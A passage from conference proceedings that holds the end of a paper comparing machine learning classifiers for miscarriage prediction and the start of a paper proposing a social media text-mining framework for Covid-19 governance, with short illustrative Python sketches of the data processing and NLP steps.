multi-dimensional pre-pregnancy data to detect and classify critical pregnancy
outcomes into six prominent labels, achieving an accuracy of 89.2%. The study
compared the proposed framework with only two existing algorithms: a five-layer
fully connected neural network and a decision tree.
Krisnanik et al. [18] developed a pregnancy risk detection system (PRDS) to
detect the risk level of pregnancy based on the symptoms experienced by the
pregnant woman. They did this through an observational study using descriptive,
predictive, and prescriptive data analysis approaches. The study provided specific
recommendations for improvement to reduce the mortality rate of pregnant women
with higher risk levels. However, the authors did not incorporate any validation
strategy, and the study was conducted on a very small sample.
In [19], the authors proposed a nature-inspired algorithm, particle swarm
optimization (PSO), to reduce the cost of a multilayer perceptron (MLP). This
technique offered better precision and lower cost for the clinical decision support systems (CDSSs)
A Miscarriage Prevention System Using Machine Learning Techniques 427
used for pregnancy care. However, the study found that the PSO algorithm suffers
from premature convergence; hence, it is not the best method for optimizing the
parameters of other ANN-based techniques.
Shafi et al. [20] applied several machine learning algorithms, namely random
forest, K-nearest neighbor, decision tree, support vector machine, and multilayer
perceptron, to propose a solution for predicting cleft in the mother's womb. A
cleft is a gap in the upper lip or the roof of the baby's mouth that forms during
development in the uterus. The multilayer perceptron, being a deep neural network,
gave more accurate results, but the number of data inputs used for prediction was
comparatively small.
Moreira et al. [21] performed a comparative study of Bayes-based machine learning
techniques, using cross-validation, to determine the optimal algorithm for
classifying hypertensive disorders during pregnancy. The study's scope did not
extend to other machine learning classification techniques.
In [22], the authors used the Naïve Bayes method for the diagnosis of
Intra-Uterine Growth Restriction (IUGR) in pregnancy. The presence of IUGR
indicates that the fetus is growing smaller than the expected standard size,
affecting the safety of both the woman and the fetus. Hence, this study can be
applied to detect such abnormalities in pregnant women. However, using only one
model limited the scope of the study.
Tayal et al. [23] compared the efficiency of different data mining techniques and
identified the decision tree as the most efficient algorithm in terms of accuracy
and specificity. The study explored pregnancy health and newborn health issues but
did not arrive at a concrete solution for any particular topic.
In [24], the authors proposed a Gaussian Naïve Bayes model to identify the risk
of abortion in pregnancy and reduce fetal mortality, considering several variables
for this purpose. The accuracy obtained was 96% on the balanced dataset. However,
the model is not embedded in a system that could provide useful results to medical
experts.
In [25], the authors attempted early prediction of preterm delivery using EHG
recordings for a particular gestation period. A random forest classifier combined
with ADASYN provided an accuracy of 99.23%. This approach could predict the
classification for shorter EHG recordings, but the study did not explore the
robustness and validation of the results.
3 Methodology
The dataset used for miscarriage detection has been taken from a GitHub
repository. It was downloaded as a comma-separated values (CSV) file and loaded
into the Python environment. The primary data were originally collected by Asri
et al. [26] using a mobile phone application and healthcare sensors.
The dataset has one million (ten lakh) records and ten attributes of interest:
unique record ID, maternal age, body mass index, number of previous miscarriages,
physical activity, location, body temperature, heart rate variability, stress, and
blood pressure. The target variable has two labels, 1 and 0, which denote the
occurrence and non-occurrence of miscarriage, respectively.
The dataset has no missing values, as verified using the Pandas library in
Python. The variables in the dataset are continuous and categorical: age, BMI,
temperature, and heart rate (BPM) are continuous, while activity, location,
stress, and blood pressure are categorical. It is evident in Fig. 2 that age is
positively correlated with the target, while BMI, temperature, and BPM are
negatively correlated with it. High-intensity physical activity and high stress
levels increase the risk of miscarriage. While checking each attribute's
proportion, it was found that 99.7% of the records were of women aged 25. These
records dominated the dataset and would have produced a biased classification.
Hence, stratified sampling has been performed, with a fixed stratum size for every
age group; for each value of age, the corresponding features were taken into
account. This was done to balance the data in equal proportions and remove the
dataset's bias. After selection, the total number of records was 1775, with ten
attributes.
80% of the dataset has been used to train the algorithms, while 20% has been used
for testing. The algorithms used for model building are K-nearest neighbor (KNN),
logistic regression, and random forest.
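The balancing and split described above can be sketched as follows. This is an illustrative sketch on a tiny synthetic stand-in for the dataset; the column names and the stratum size of five are assumptions for demonstration, not the authors' actual values.

```python
import pandas as pd

# Illustrative stand-in for the miscarriage dataset; the real CSV has
# ~1,000,000 records heavily dominated by age 25.
df = pd.DataFrame({
    "age": [25] * 50 + [30] * 10 + [35] * 10,
    "bmi": list(range(70)),
    "target": [0, 1] * 35,
})

STRATUM_SIZE = 5  # fixed number of records kept per age stratum (assumed value)

# Stratified sampling: draw the same number of records from every age group.
balanced = df.groupby("age", group_keys=False).sample(
    n=STRATUM_SIZE, random_state=42
)

# 80/20 train-test split by shuffling and slicing.
shuffled = balanced.sample(frac=1, random_state=42).reset_index(drop=True)
cut = int(0.8 * len(shuffled))
train_df, test_df = shuffled.iloc[:cut], shuffled.iloc[cut:]

print(balanced["age"].value_counts().to_dict())
print(len(train_df), len(test_df))
```

With equal strata, each age group contributes the same number of records, removing the age-25 dominance before the split.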
KNN is a supervised classification algorithm and needs labeled data for training.
KNN predicts the class of a test data point from the available class labels by
finding the k training points nearest to it. This involves calculating the
distance between data points using measures such as Euclidean, Manhattan, Hamming,
or Minkowski distance. The main steps of KNN are as follows: load the data,
calculate the distances, find the closest neighbors, and assign the label by
voting among the neighbors' labels. To choose an optimal value of K, the error
rate is plotted against K over a defined range, and the K value with the minimum
error rate is chosen.
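A minimal, self-contained sketch of these steps (Euclidean distance, nearest-neighbor vote, and error-rate-based choice of K) on toy data; the data points and range of K here are illustrative, not the authors' actual setup.

```python
import math
from collections import Counter

def knn_predict(train, test_point, k):
    """Classify test_point by majority vote among its k nearest neighbors.

    train is a list of (features, label) pairs.
    """
    dists = sorted((math.dist(x, test_point), label) for x, label in train)
    votes = Counter(label for _, label in dists[:k])
    return votes.most_common(1)[0][0]

# Toy labeled data: two well-separated classes.
train = [((1.0, 1.0), 0), ((1.2, 0.8), 0), ((0.9, 1.1), 0),
         ((5.0, 5.0), 1), ((5.2, 4.8), 1), ((4.9, 5.1), 1)]
held_out = [((1.1, 1.0), 0), ((5.1, 5.0), 1), ((0.8, 0.9), 0)]

# Choose K by the error rate on held-out points.
error_rate = {}
for k in range(1, 6):
    errors = sum(knn_predict(train, x, k) != y for x, y in held_out)
    error_rate[k] = errors / len(held_out)

best_k = min(error_rate, key=error_rate.get)
print(best_k, error_rate[best_k])
```

In practice the same error-rate-versus-K curve would be plotted, as the text describes, and the minimum chosen from the plot.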
Logistic regression is a supervised algorithm used to divide the dataset into
classes by estimating probabilities with the sigmoid (logistic) function. The aim
is to find the best-fitting model to describe the relationship between the binary
dependent variable and a set of independent variables. Logistic regression makes
the following assumptions:
430 S. Biswas and S. Shukla
• For binary logistic regression, the dependent variable needs to be binary. The first
level of the dependent variable factor should also represent the desired outcome.
• The model should have negligible or no multicollinearity.
• Logistic regression needs a large sample size.
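The sigmoid function at the core of logistic regression maps any real-valued score to a probability in (0, 1), and a class is then assigned by thresholding at 0.5. A minimal sketch; the weights and features below are arbitrary illustrative values, not fitted coefficients.

```python
import math

def sigmoid(z):
    """Logistic function: squashes a real score into (0, 1)."""
    return 1.0 / (1.0 + math.exp(-z))

def predict(features, weights, bias, threshold=0.5):
    """Probability and class label for one data point."""
    z = sum(w * x for w, x in zip(weights, features)) + bias
    p = sigmoid(z)
    return p, int(p >= threshold)

# Arbitrary example weights, not fitted to any real data.
p, label = predict(features=[1.0, 2.0], weights=[0.8, -0.3], bias=0.1)
print(round(p, 3), label)
```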
Random forest is a supervised algorithm used for both classification and
regression; this work focuses on its use as a classification technique. A random
forest is constructed from multiple decision trees. It is preferred over a single
decision tree because it uses an ensemble learning approach, averaging the results
and thereby reducing overfitting. The steps involved in random forest are:
selecting random samples, constructing a decision tree for every sample to obtain
its individual prediction, voting on the predicted results, and selecting the
result with the highest number of votes as the final prediction.
Model validation has been performed using the K-fold cross-validation technique,
with K taken as 10. The performance metrics used here are the confusion matrix,
accuracy, precision, recall, F1 score, AUC score, and ROC curve.
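The idea of K-fold cross-validation with K = 10 is to partition the records into ten folds, train on nine, and validate on the remaining one, rotating the held-out fold and averaging the scores. A stdlib-only sketch of the fold construction; in practice a library routine such as scikit-learn's KFold would typically be used.

```python
def kfold_indices(n, k=10):
    """Partition indices 0..n-1 into k contiguous, near-equal folds."""
    folds, start = [], 0
    for i in range(k):
        size = n // k + (1 if i < n % k else 0)  # spread the remainder evenly
        folds.append(list(range(start, start + size)))
        start += size
    return folds

folds = kfold_indices(1775, k=10)  # 1775 records after stratified sampling
for val_fold in folds:
    # Train on all other folds, validate on val_fold, then average the 10 scores.
    train_idx = [j for f in folds if f is not val_fold for j in f]

print([len(f) for f in folds])
```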
4 Results and Discussion

The accuracy obtained for K-nearest neighbor, logistic regression, and random
forest is 95%, 97%, and 97%, respectively. Therefore, it can be concluded that
random forest correctly predicts 97% of the time whether a woman will have a
miscarriage.
The precision is 100% for all three models for women labeled as having no
miscarriage. For logistic regression and random forest, the precision obtained is
95% for women labeled as having a miscarriage; for K-nearest neighbor, it is 94%.
In all three models, the recall obtained is 94% for women labeled as having no
miscarriage and 100% for women labeled as having a miscarriage.
In all three models, the F1 score obtained is 97% for both classes, miscarriage
and no miscarriage.
From the ROC curves shown in Fig. 3, it is evident that all three models have
high separability power, which means they have a high chance of accurately
classifying a new case. As the ROC curves for random forest and logistic
regression lie slightly above that of K-nearest neighbor, their chances of correct
classification are slightly better.
Therefore, all three techniques considered here for classification have high
accuracy, although random forest and logistic regression show greater accuracy
than KNN. Random forest is recommended for application in practical situations as
it is based on ensemble learning, prevents overfitting, and offers useful
additional functionality.
5 Conclusion
This work highlights the various machine learning classification models
constructed to predict miscarriage during the early stages of pregnancy. A
comparative analysis was done to check the constructed models' performance using
standard evaluation metrics. This will help patients and the concerned experts
take the necessary precautions to prevent miscarriage. Primary data collection
from healthcare centers was not possible due to the COVID-19 situation, and the
study is limited to a few classification algorithms. We plan to extend this work
by collecting primary data from hospital records and using other classification
and regression techniques.
References
1. Magnus, M. C., Wilcox, A. J., Morken, N. H., Weinberg, C. R., & Håberg, S. E. (2019). Role
of maternal age and pregnancy history in risk of miscarriage: Prospective register based study.
BMJ (Online), 364, 1–8.
2. Bruno, V., D’Orazio, M., Ticconi, C., Abundo, P., Riccio, S., Martinelli, E., Rosato, N., Piccione,
E., Zupi, E., & Pietropolli, A. (2020). Machine learning (ML) based-method applied in recurrent
pregnancy loss (RPL) patients diagnostic work-up: A potential innovation in common clinical
practice. Scientific Reports, 10(1), 1–12. https://doi.org/10.1038/s41598-020-64512-4
3. Liu, L., Jiao, Y., Li, X., Ouyang, Y., & Shi, D. (2020). Machine learning algorithms to predict
early pregnancy loss after in vitro fertilization-embryo transfer with fetal heart rate as a strong
predictor. Computer Methods and Programs in Biomedicine, 196, 105624. https://doi.org/10.1016/j.cmpb.2020.105624
20. Shafi, N., Bukhari, F., Iqbal, W., Almustafa, K. M., Asif, M., & Nawaz, Z. (2020). Cleft
prediction before birth using deep neural network. Health Informatics Journal, 54590.
https://doi.org/10.1177/1460458220911789
21. Moreira, M. W. L., Rodrigues, J. J. P. C., Carvalho, F. H. C., Chilamkurti, N., Al-Muhtadi, J.,
& Denisov, V. (2019). Biomedical data analytics in mobile-health environments for high-risk
pregnancy outcome prediction. Journal of Ambient Intelligence and Humanized Computing,
10(10), 4121–4134. https://doi.org/10.1007/s12652-019-01230-4
22. Badriyah, T., Savitri, N. A., Sa’adah, U., & Syarif, I. (2020). Application of naive bayes method
for IUGR (Intra Uterine Growth Restriction) diagnosis on the pregnancy. In 2020 International
Conference on Electrical, Communication, and Computer Engineering (ICECCE) (pp. 1–4).
Istanbul, Turkey. https://doi.org/10.1109/ICECCE49384.2020.9179256
23. Tayal, D. K., Meena, K., Pragya, & Kumar, S. (2018). Analysis of various data mining tech-
niques for pregnancy related issues and postnatal health of infant using machine learning and
fuzzy logic. In 2018 3rd International Conference on Communication and Electronics Systems
(ICCES) (pp. 789–793). Coimbatore, India. https://doi.org/10.1109/CESYS.2018.8724082
24. Campero-Jurado, I., Robles-Camarillo, D., & Simancas-Acevedo, E. (2020). Problems in
pregnancy, modeling fetal mortality through the Naïve Bayes classifier. 11(3), 121–129.
25. Despotović, D., Zec, A., Mladenović, K., Radin, N., & Turukalo, T. L. (2018). A machine
learning approach for an early prediction of preterm delivery. In 2018 IEEE 16th International
Symposium on Intelligent Systems and Informatics (SISY) (pp. 000265–000270). Subotica.
https://doi.org/10.1109/SISY.2018.8524818
26. Asri, H., Mousannif, H., & Al Moatassime, H. (2018). Comprehensive miscarriage dataset for
an early miscarriage prediction. Data in Brief, 19, 240–243. https://doi.org/10.1016/j.dib.2018.
05.012
Efficacious Governance During
Pandemics Like Covid-19 Using
Intelligent Decision Support Framework
for User Generated Content
Abstract During the unprecedented global health emergency caused by the Covid-19
pandemic, the governments and nationalized organizations of all countries are
struggling to control its spread by enforcing various measures and to manage its
social-economic impact through policy intervention. In such a critical situation,
it becomes imperative to take data-driven decisions. User generated content on
online social media is an untapped data source that can be leveraged to gain
insights for effective governance and decision making, and can also serve as a
first-hand communication medium between the various government bodies and
citizens. In this paper, we propose a novel governance framework that leverages
user generated content on social media for effective decision making by the
authorities. We use topic modelling techniques to discover social-economic trends
and to understand the issues or concerns of public interest. We use information
extraction techniques such as noun and verb phrase extraction and Named Entity
Recognition to measure the geographical spread, identify Covid-19 hotspots, assist
in contact tracing, and discover new health conditions. In the available
literature, we could not find any intelligent framework for effective governance
during pandemics in which user generated content is utilized for real-time
decision making. In this paper, we address this real-world problem through our
proposed decision support system and demonstrate, as a proof of concept through
its prototype implementation, how it can be used for effective governance during
pandemics.
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 435
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_35
436 R. Jindal and A. Malhotra
1 Introduction
1 https://www.who.int/director-general/speeches/detail/who-director-general-s-opening-remarks-at-the-media-briefing-on-covid-19---11-march-2020.
government bodies and various other national organizations, and can assist in the
following tasks that are otherwise difficult to accomplish in a real-time,
time-bound manner, even with large human bandwidth:
• In our proposed framework, we use topic modelling techniques to discover and
predict various social and economic trends at the national and regional levels,
and to understand issues and public concerns. This serves as a useful input for
policy formulation and intervention to manage the collateral impact caused by the
pandemic in all social-economic public and private sectors.
• We use unsupervised information extraction and aggregation techniques, namely
noun and verb phrase extraction, Named Entity Recognition, and clustering, on user
generated content from social media to measure geographical spread, identify
Covid-19 hotspots, assist in contact tracing, and discover new symptoms and health
condition indicators.
• We have done a prototype implementation of our proposed framework as a proof of
concept that it can serve as a decision-making tool for effective governance
during such health emergencies. This is a novel idea for governance during
pandemics, as we could not find a similar framework in the existing literature.
These are the major contributions of our proposed framework that are explained in
the subsequent sections with implementation results on a sample dataset. The related
literature survey is discussed in the following section.
2 Related Work

The scope of this section is to discuss the relevant research published in the
year since the pandemic outbreak, where machine learning and natural language
processing techniques have been used for Covid-19 related applications and use
cases, specifically those utilizing user generated content from social media.
Even though some research has been done on opinion and sentiment analysis related
to Covid-19 from social media, we did not find any research or prototype where a
comprehensive framework has been proposed or implemented for effective governance
and management of the social-economic issues arising from the unprecedented
pandemic situation caused by the novel coronavirus.
Oyebode et al. have analysed the sentiment polarity of Covid-19 related comments
from various social media by extracting opinionated key phrases and themes using
predefined POS grammar rules (context-based NLP techniques). This technique helped
in discovering positive and negative themes/issues related to Covid-19 across
various categories (e.g. economics, education, socio-political) and in
understanding the corresponding public perceptions [4]. Samuel et al. have
performed basic sentiment classification of Covid-19 related tweets using logistic
regression and Naïve Bayes [5]; another study analyses the emotions and sentiments
evoked by English news headlines [6]. A study using NLP feature engineering
techniques, trend analysis with unsupervised clustering, and topic modelling has
been done on the Reddit Mental Health Support groups dataset to understand the
change in people's anxiety levels before and during the pandemic [7]. An
evidence-based knowledge acquisition (EBKA) approach has been demonstrated to
aggregate novel and trustworthy information from social media to augment the
information about real-world events, in this case Covid-19 [8].
Chen et al. have extensively reviewed the datasets and systems related to NLP
techniques for biomedical research, e.g. entity recognition in medical documents,
question answering for building a Covid-19 chatbot, discovering medical concepts,
literature-based discovery, and understanding EHRs (electronic health records);
however, social media text analytics is not covered in much detail [9].
Swapnarekha et al. have done an extensive state-of-the-art review of the existing
machine learning and intelligent computing research being done for the diagnosis,
classification, forecasting, prediction, and prevention of Covid-19 [2]. They
provide an in-depth review of how different machine learning and big data
analytics techniques are being used for various use cases related to the Covid-19
pandemic, for example: using algorithms like random forests, XGBoost, and SVM for
detecting Covid-19 from chest/lung X-rays and CT scans; analysing the impact of
policy measures like social distancing and mask wearing in reducing transmission;
and using linear regression and neural networks for forecasting and trend
prediction. A similar survey has been done by Bullock et al. to map the landscape
of AI- and ML-based applications developed for Covid-19 across three broad
categories: molecular (e.g. protein structure prediction, drug development,
vaccine discovery); clinical (e.g. medical imaging for diagnosis, disease tracking
and prediction); and societal (e.g. modelling and forecasting statistics,
clustering of nations based on various factors, public policy) [3]. We used this
review paper specifically to understand the state of the AI and ML applications
developed for societal use cases. Though most of the research has been done on
modelling and forecasting the statistics related to the spread of Covid-19, some
very preliminary and basic applications have been built to leverage online social
media for understanding public opinion and sentiment, the propagation of
misinformation and hate speech, and the efficacy of public policy. As we could
gauge from these two review papers, not much research has been done to leverage
machine learning and intelligent computing techniques coupled with publicly
available social media data for designing effective governance measures during
pandemics. This research gap is the main focus and contribution of our paper,
since real-time big data from social media is an untapped resource that can serve
as an excellent decision-making tool for government bodies and help them better
understand public issues and concerns at the state and national levels.
3 Proposed Framework
Our novel proposed framework for effective governance during pandemics like
Covid-19 is depicted in Fig. 1 and explained in detail in this section. The
proposed governance framework consists of three main modules: (1) text
pre-processing pipeline, (2) information extraction module, and (3)
social-economic trend prediction module. The idea is to develop and deploy
real-time tools that monitor the publicly available user generated content on
social media and serve as a decision support system giving meaningful insights to
various government and nationalized bodies. Such tools and technologies can assist
decision making related to the governance measures and policies required in the
short and long term to handle crisis situations like the one the world has been
facing since 2020 due to the global Covid-19 pandemic.
3.1 Text Pre-processing Pipeline

This module is a mandatory precursor to any analysis or system that leverages
user generated content from popular social media platforms, mainly because such
content is non-standardized, multimodal and multilingual in nature, contains
heterogeneous platform-specific information, and is noisy and error-prone. Hence,
before applying machine learning, big data, and text analytics techniques, the
following pre-processing steps become essential.
Extract Platform-Specific Information: Platform-specific non-textual information
such as geolocation tags, @mentions, and #tags must be separated from the textual
content of the user's posts. Even though this information is noise for any
NLP-based system,
Fig. 1 Proposed framework for efficacious governance during pandemics like Covid-19
within the scope of our current application it can be very useful for contact
tracing and identifying Covid-19 hotspots. Hence, we extract and store the
geolocation tags, #tags, and @mentions used to tag people in users' social media
posts.
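A minimal sketch of this separation step using regular expressions; the sample post and patterns are illustrative, and a production system would prefer the structured fields exposed by the platform APIs where available.

```python
import re

def extract_platform_info(post):
    """Split a social media post into tags/mentions/URLs and plain text."""
    hashtags = re.findall(r"#\w+", post)
    mentions = re.findall(r"@\w+", post)
    urls = re.findall(r"https?://\S+", post)
    # Remove the extracted elements, keeping only the textual content.
    text = re.sub(r"#\w+|@\w+|https?://\S+", " ", post)
    text = re.sub(r"\s+", " ", text).strip()
    return {"hashtags": hashtags, "mentions": mentions, "urls": urls, "text": text}

post = "Met @asha at the market today #Covid19 #lockdown https://example.com/news"
info = extract_platform_info(post)
print(info["hashtags"], info["mentions"], info["text"])
```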
Cleaning and Noise Removal: In order to standardize the text of users' social
media posts and enhance the quality of the input to the NLP and ML algorithms that
follow, it is essential to remove the noisy elements from the text. We pre-process
the text by removing special characters, punctuation, numerals, emoticons, and
URLs (which are very common in social media posts); the hashtags and mentions have
already been removed in the previous step. Next, we remove the stop words (like
"a", "the", and "and") as they do not add any value with respect to the
information extraction and trend prediction we wish to accomplish. Finally, case
conversion is done to bring uniformity, as people are usually not very
case-conscious while posting on social media.
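These cleaning steps can be sketched as below; the stop word list here is a tiny illustrative subset (a real pipeline would use a full list such as NLTK's).

```python
import re

# Tiny illustrative stop word list; a real pipeline would use a full one.
STOP_WORDS = {"a", "an", "the", "and", "or", "is", "are", "of", "in", "to"}

def clean(text):
    """Lowercase, strip URLs/punctuation/digits, and drop stop words."""
    text = text.lower()
    text = re.sub(r"https?://\S+", " ", text)   # URLs
    text = re.sub(r"[^a-z\s]", " ", text)       # punctuation, digits, emoticons
    tokens = [t for t in text.split() if t not in STOP_WORDS]
    return " ".join(tokens)

print(clean("The second wave is SPREADING in Delhi!! See https://example.com"))
```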
Tokenization: This is a fundamental step of any NLP pipeline, breaking the input
text document, sentence, or phrase into meaningful tokens. Tokens are the logical
inputs to any NLP algorithm and can be created at three levels: word level,
sub-word level (i.e. n-grams), or character level. Since our application aims to
infer meaningful topics, trends, and entities, we perform word-level tokenization
to extract the bag of words from users' social media posts.
Lemmatization: This is the process of reducing the words in the document
vocabulary to the root words from which they are derived, in order to group
together and analyse the different inflected forms of the same base word as a
single entity. Unlike stemming, which is a crude heuristic process that chops off
the affixes of a word, lemmatization is done using proper grammatical and
morphological rules and correct identification of parts of speech. This step
reduces the dimensionality of the documents (in our case, users' social media
posts) and makes the feature matrix less sparse.
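The contrast between stemming and lemmatization can be illustrated with a toy lookup-based lemmatizer; real systems (e.g. WordNet-based or spaCy lemmatizers) derive this mapping from full morphological dictionaries, so the table below is purely illustrative.

```python
# Toy lemma table: maps inflected forms to their dictionary root.
LEMMAS = {
    "spreading": "spread", "spread": "spread",
    "cases": "case", "case": "case",
    "was": "be", "is": "be", "are": "be",
    "better": "good",          # irregular form a crude stemmer cannot handle
}

def lemmatize(token):
    """Return the root form of a token, falling back to the token itself."""
    return LEMMAS.get(token.lower(), token.lower())

def crude_stem(token):
    """Naive suffix chopping, for contrast with lemmatization."""
    for suffix in ("ing", "es", "s"):
        if token.endswith(suffix) and len(token) > len(suffix) + 2:
            return token[: -len(suffix)]
    return token

print(lemmatize("better"), crude_stem("better"))   # lemma handles irregulars
print(lemmatize("spreading"), crude_stem("spreading"))
```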
Chunking and POS Tagging: The bag-of-words (token) approach described above loses
the information about the semantic structure and actual meaning of the sentence.
Chunking, along with part-of-speech (POS) tagging, refers to extracting phrases of
words from the sentence to understand the logical sentence structure. It helps to
derive the various constituents from unstructured text, i.e. nouns, pronouns,
adjectives, verbs, adverbs, prepositions, conjunctions, and interjections.
Chunking and POS tagging are essential steps of Named Entity Recognition (NER),
which helps us extract constituents like names, places, events, and dates from
unstructured text. Additionally, for topic modelling and thematic analysis of user
generated text, it is important to retain the logically related phrases instead of
mere individual tokens.
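A sketch of chunking: given POS-tagged tokens (in practice produced by a tagger such as NLTK's; hand-tagged here for illustration), a simple grammar groups consecutive adjectives and nouns into noun phrase chunks.

```python
def noun_phrase_chunks(tagged):
    """Group runs of adjectives (JJ) and nouns (NN*) into chunks."""
    chunks, current = [], []
    for word, tag in tagged:
        if tag.startswith("JJ") or tag.startswith("NN"):
            current.append((word, tag))
        else:
            if any(t.startswith("NN") for _, t in current):
                chunks.append(" ".join(w for w, _ in current))
            current = []
    if any(t.startswith("NN") for _, t in current):
        chunks.append(" ".join(w for w, _ in current))
    return chunks

# Hand-tagged sample sentence (tags follow the Penn Treebank convention).
tagged = [("New", "NNP"), ("cases", "NNS"), ("rose", "VBD"),
          ("in", "IN"), ("South", "NNP"), ("Delhi", "NNP"),
          ("last", "JJ"), ("week", "NN")]
print(noun_phrase_chunks(tagged))
```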
3.2 Information Extraction Module

This module of our proposed system is designed to achieve the following goals:
measure geographical spread, identify Covid-19 hotspots, assist in contact tracing
to identify probable cases, and discover new symptoms and health condition
indicators related to the ongoing pandemic disease. Unstructured textual data
(users' posts) contains a vast amount of information, not all of which may be
relevant in the current context. Information extraction is an NLP task in which we
retrieve the information of interest within the context of the current information
need and extract structured pieces of information from free-flowing text. We may
be looking for different pieces of information such as names of entities,
relationships between entities, a place, a date, a sequence of events, an idea, a
thought, or a state of being. In our research, the goal is to extract person
names, places/locations, organizations, action verbs, and states of being, which
will help us in measuring the geographical spread of the pandemic, identifying
hotspots, contact tracing, and discovering new health indicators related to the
pandemic. We have used three information extraction techniques, noun phrase
detection, verb phrase detection, and Named Entity Recognition, to accomplish the
above tasks; the methodology adopted is explained in detail below.
Noun and Verb Phrase Detection: In any language, there are eight parts of speech
that determine the grammatical role a word plays in a sentence: nouns, pronouns,
adjectives, verbs, adverbs, prepositions, conjunctions, and interjections. In the
NLP domain, the task of determining and assigning the correct part-of-speech tag
to each word in a sentence based on the role it plays is called POS tagging. POS
tagging helps to understand sentence structure and to build rules to extract the
relevant information of interest. We use this technique to identify the noun and
verb phrases in users' posts, which are the most informative pieces of the posts
for our research problem. Nouns represent people, places, things, and ideas; verbs
are action words or words that depict a state of being. We implemented POS tagging
and built rules to extract noun and verb phrases. This helps ascertain the
geographical spread of the pandemic based on statistical analysis of the Covid-19
related user posts on social media within the region and time duration of
interest. We extracted proper nouns, which could be the names of people a user may
have met or places he may have visited. The location tags and mentions, if
available from the previous pre-processing step, help to accurately determine the
user's location and the people he may have come in contact with. Government
healthcare bodies can use this technique for effective contact tracing, which has
proved to be a successful measure worldwide for containing the spread of the
pandemic. The world witnessed the Covid-19 pandemic for the first time; hence,
during the initial days of the pandemic, new symptoms of Covid-19 were continually
being added to the WHO list.2 Automated techniques like the one proposed in our
framework can discover possibly associated new symptoms and health indicators
related to a pandemic by aggregation and statistical analysis of the verb phrases
from the
2 https://www.who.int/emergencies/diseases/novel-coronavirus-2019/advice-for-public.
Covid-19 related user generated content on social media. The verb phrases
extracted are action verbs and also denote states of being. These can be retrieved
from users' posts, as users were seen writing about their health condition owing
to the anxiety, uncertainty, and paranoia related to Covid-19 in the initial
months. Now, as the world commences the vaccination phase, this can also assist
government bodies in discovering the health indicators users post about, so as to
learn in a timely manner about adverse effects of the vaccines, which have been
developed in record time.
Entity Recognition: We use the popular NLP- and AI-based automated information
extraction technique called Named Entity Recognition (NER) to further augment the
information retrieved from users' unstructured textual posts. NER is the task of
locating and identifying named atomic elements, or entities, in unstructured text
and classifying them into predefined categories such as people's names, locations,
organization and company names, date and time objects, quantifying measures,
currencies, and artefacts. As per the English dictionary, an entity is a thing or
a concept with distinct characteristics and independent existence. Unlike POS
tagging, which assigns a part-of-speech tag to each word token, NER is able to
extract entities that may be a single word or a word phrase (chunk) referring to
the same concept, thereby enabling more meaningful learning and generating
valuable insights from large volumes of unstructured text. Machine learning models
need to be trained on relevant language literature to learn the different entity
categories and granular rules so that they can locate and identify the relevant
entities in unstructured text. For basic applications, one may even use a lexicon-
or rule-based NER system. However, for our niche and specialized use case, we
would need trained ML models to build a generalized and scalable NER system that
works efficiently in a real-time global application.
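As a contrast to the trained models the framework calls for, the lexicon/rule-based variant mentioned above can be sketched in a few lines; the lexicon here is a tiny illustrative sample, and a real system would need far larger dictionaries plus disambiguation rules (e.g. lowercased "who" would otherwise collide with the pronoun).

```python
# Tiny illustrative lexicon mapping known entity strings to categories.
LEXICON = {
    "new delhi": "LOCATION",
    "mumbai": "LOCATION",
    "who": "ORGANIZATION",
    "fever": "SYMPTOM",
}

def lexicon_ner(text, lexicon=LEXICON, max_len=3):
    """Greedy longest-match NER over word n-grams (up to max_len words)."""
    tokens = text.lower().split()
    entities, i = [], 0
    while i < len(tokens):
        for n in range(max_len, 0, -1):            # prefer longer matches
            phrase = " ".join(tokens[i:i + n])
            if phrase in lexicon:
                entities.append((phrase, lexicon[phrase]))
                i += n
                break
        else:
            i += 1
    return entities

print(lexicon_ner("WHO reported fever cases in New Delhi"))
```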
Information Aggregation: We have proposed a decision support framework for effective governance-related decision making during pandemics, using the unstructured data from users' social media posts. An essential and desirable characteristic of such an application is the ability to work in real time and process data streams on a 24×7 continuous basis. To handle the volume and velocity of the incoming unstructured data stream in real time and to process it efficiently, it is essential to aggregate and categorize the information into meaningful buckets of logically related and similar data. For this purpose, we implement two unsupervised machine learning algorithms, K-Means clustering and hierarchical agglomerative clustering, to group and aggregate the semantically related and similar information extracted above. We cluster the similar noun and verb phrases and entities collected above for quick consumption and comprehension by government officials from the various national bodies working on pandemic management and containment. These clusters of valuable information can be presented to them via a dashboard or a keyword-based search tool.
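As a minimal sketch of the K-Means step, assuming the extracted phrases have already been mapped to small numeric feature vectors (the deterministic initialization and plain Euclidean distance here are illustrative simplifications, not the framework's production code):

```python
def kmeans(points, k, iters=50):
    """Plain K-Means: points are tuples of floats; the first k points seed the centroids."""
    centroids = [tuple(p) for p in points[:k]]  # simple deterministic init (illustrative)
    clusters = [[] for _ in range(k)]
    for _ in range(iters):
        clusters = [[] for _ in range(k)]
        for p in points:
            # assign each point to its nearest centroid (squared Euclidean distance)
            j = min(range(k),
                    key=lambda c: sum((a - b) ** 2 for a, b in zip(p, centroids[c])))
            clusters[j].append(p)
        for j, cluster in enumerate(clusters):
            if cluster:  # recompute each centroid as the mean of its cluster
                centroids[j] = tuple(sum(dim) / len(cluster) for dim in zip(*cluster))
    return centroids, clusters
```

Hierarchical agglomerative clustering would instead merge the closest clusters bottom-up, which avoids fixing k in advance at the cost of higher computational complexity.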
Efficacious Governance During Pandemics … 443
In the era of Web 3.0, social media platforms have become a primary medium of communication. People post about their day-to-day activities, vacations, experiences and feelings, and express emotions, opinions, thoughts, ideas, etc. spanning the whole gamut of human life. This phenomenon continued during the unprecedented global crisis caused by the Covid-19 pandemic; on social media, people were talking about a multitude of topics such as work from home, job losses, hunger, deaths, depression, domestic violence, the supply chain of FMCG goods, the availability of hospitals and care, vaccination for corona, and more. The plethora of topics discussed on social media has been dynamic and evolved over the course of the pandemic through the various months of 2020. For example, in
India, people initially talked about the availability of sanitizers, masks and hospital care; then about the imposed lockdown and the condition of migrant labourers, job losses and work from home, vaccine development, GDP contraction and the sectors of the economy that were impacted the most; in the later months of 2020, users also discussed the economic and social reforms required for recovery. Presently, people are talking about the efficacy and side effects of Covid-19 vaccines, the different vaccines available and their administration, etc. These are just a few examples.
The topics of conversations on social media varied across the globe from nation to
